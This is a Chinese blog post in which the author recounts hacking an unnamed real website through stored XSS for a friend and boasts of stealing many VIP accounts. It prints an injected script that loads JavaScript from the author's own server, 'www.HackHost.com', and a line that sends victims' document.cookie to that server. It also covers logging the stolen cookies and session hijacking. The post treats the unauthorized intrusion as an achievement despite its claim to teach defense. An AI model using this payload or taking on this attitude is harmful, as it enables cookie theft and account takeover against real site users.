首次成功实施 XSS 攻击,盗取目标网站大量 VIP 帐号

简介:

前言


之前做网站时有做代码防御 XSS(Cross Site Script) 攻击,但是却只处于了解的阶段,并不知道其中具体的原理,更别说使用了。最近有朋友要求我帮助他 Hack 一个网站,达到一定的目的。思考来思考去,最后想了一套方案,并最终成功实施。现在回想起来,整套解决方案中,其实主要就是 XSS。

(   本文不会公布目标网站地址。主要是为了交流技术,以帮助大家在 Web 开发中更好地防御 XSS。

看文章标题说得比较牛,其实我也不会去修改他们的密码,太坏的事咱可不能干,哈哈。 :)   )

 

XSS 简述


关于 XSS 的讲解,网上还是比较多的,参照百度百科吧:http://baike.baidu.com/view/50325.htm

 

攻击流程


假设我想盗取 www.Target.com 中的其他用户,并使用他们的身份来登录该站点。那么我同时还需要一个自己的服务器,假设为 www.HackHost.com。然后,使用我自己的帐号登录到 Target.com,然后在我的个人页面中提交脚本(例如在个人档案中加入一定的脚本。关于如何提交,后面再讨论。)。该脚本内容比较简单,如下:

var cb = document.createElement("script"); cb.src = "www.HackHost.com/clientHacker.js?" + new Date().getTime(); document.body.appendChild(cb);

这样,每个浏览我的个人页面的其他用户,都会自动下载 www.HackHost.com/clientHacker.js 这个 javascript 文件执行。这个文件是部署到我的 HackHost.com 服务器上的,我可以在其中加入任意的脚本。这样,当前登录的用户的整个客户端都处于这个脚本的控制当中。

接下来,可以把该用户的 cookie 通过 document.cookie 得到,然后提交到 HackHost.com。由于这里已经跨域,所以不能使用 Ajax 提交。跟刚才下载文件一样,可以拼接链接地址再下载一个新的文件就可以了。例如,下载:’www.HackHost.com/cookieGetter.ashx?c=’ + document.cookie。

而服务端接收到这个请求后,可以把 Cookie、IP、时间等记录下来。这样就可以方便我慢慢地分析每个请求。

 

所需工具


这次 Hack 涉及到的工具不多,主要是用 fiddler 分析和伪造各种 HTTP 请求。

另外,还会重用到之前秒杀的一些类库(见:《“秒杀”心得》),主要用于 .NET 环境下使用代码提交构造好的 HTTP 请求。

 

结果截图


image

好多 VIP 帐号啊。 :)

 

难点


其实 XSS 的难点在于,如何把脚本注入到目标网站中。这需要分析目标网站的输入过滤规则,然后构造不满足过滤规则而且可以最终执行的 js。这篇文章里面讲的还不错:《一只完整的XSS wrom实现流程》。

别处,用 js 并不能获取到完整的 Cookie 值,这是因为如果 Cookie 中带有 HttpOnly 标记的话,js 是不能读取的。例如,asp.net 网站的 SessionId 对应的客户端 Cookie 就是标记了 HttpOnly的。否则,我们就可以通过 js 获取到最近可用的 Session,并伪造该 Session 进行(Session 劫持)。

 

 

小结


总体上来说,这次的攻击是比较简单的。而且这次的目标网站对于自身的安全性确实没有做什么工作,很轻易我就把 js 注入了。另外,他们还把用户标识保存在 cookie 中,虽然标识是加密后的,但是这不影响我的使用场景。

之前做过秒杀,但是算不上 Hack,这是第一次成功 Hack,所以写这篇文章简单纪念一下。 :)

 

 

(一月最少一篇总结,总算是在本月最后关头提交上来了,差一点断,哈。)

目录
相关文章
|
6月前
|
安全 数据安全/隐私保护
渗透攻击实例-后台弱口令
渗透攻击实例-后台弱口令
|
6月前
|
数据安全/隐私保护
渗透攻击实例-账号过期被重新利用
渗透攻击实例-账号过期被重新利用
|
6月前
|
数据采集 安全 数据安全/隐私保护
渗透攻击实例-未授权访问/权限绕过
渗透攻击实例-未授权访问/权限绕过
|
6月前
|
安全 Linux 网络安全
渗透攻击实例-黑客大佬们都浏览哪些网站?
渗透攻击实例-黑客大佬们都浏览哪些网站?
渗透攻击实例-黑客大佬们都浏览哪些网站?
|
9月前
|
安全 前端开发 JavaScript
信息服务上线渗透检测网络安全检查报告和解决方案2(安装文件信息泄漏、管理路径泄漏、XSS漏洞、弱口令、逻辑漏洞、终极上传漏洞升级)
信息服务上线渗透检测网络安全检查报告和解决方案2(安装文件信息泄漏、管理路径泄漏、XSS漏洞、弱口令、逻辑漏洞、终极上传漏洞升级)
131 0
|
SQL 安全 前端开发
网站会员信息被黑客入侵攻击修改了数据怎么解决
2020春节即将来临,收到新聚合支付平台网站客户的求助电话给我们Sinesafe,反映支付订单状态被修改由原先未支付修改为已支付,导致商户那边直接发货给此订单会员了,商户和平台的损失较大,很多码商都不敢用此支付平台了,为了防止聚合支付系统继续被攻击,我们SINE安全大体情况了解后,立即安排从业十年的安全工程师,成立聚合、通道支付平台安全应急响应小组。
223 0
网站会员信息被黑客入侵攻击修改了数据怎么解决
|
安全 程序员 测试技术
网站安全检测之用户密码找回网站漏洞的安全分析与利用
我们SINE安全在对网站,以及APP端进行网站安全检测的时候发现很多公司网站以及业务平台,APP存在着一些逻辑上的网站漏洞,有些简简单单的短信验证码可能就会给整个网站带来很大的经济损失,很简单的网站功能,比如用户密码找回上,也会存在绕过安全问题回答,或者绕过手机号码,直接修改用户的账户密码。
155 0
网站安全检测之用户密码找回网站漏洞的安全分析与利用
|
SQL 缓存 安全
WordPress 站点地址被恶意篡改的防护方案讨论
关键词:WordPress,篡改,挂马,恶意,攻击,注入,跳转,重定向,网址,siteurl,home,url,hacked,jump,redirect 摘要:WordPress 站点稍有不慎就有可能受到恶意攻击。一种常见的手段是通过篡改站点的地址,用户访问网站时将会被重新定向到恶意网站。长老将分析两种常见的攻击手段:修改文件和修改数据库,并分享一些安全防护的小技巧。
553 0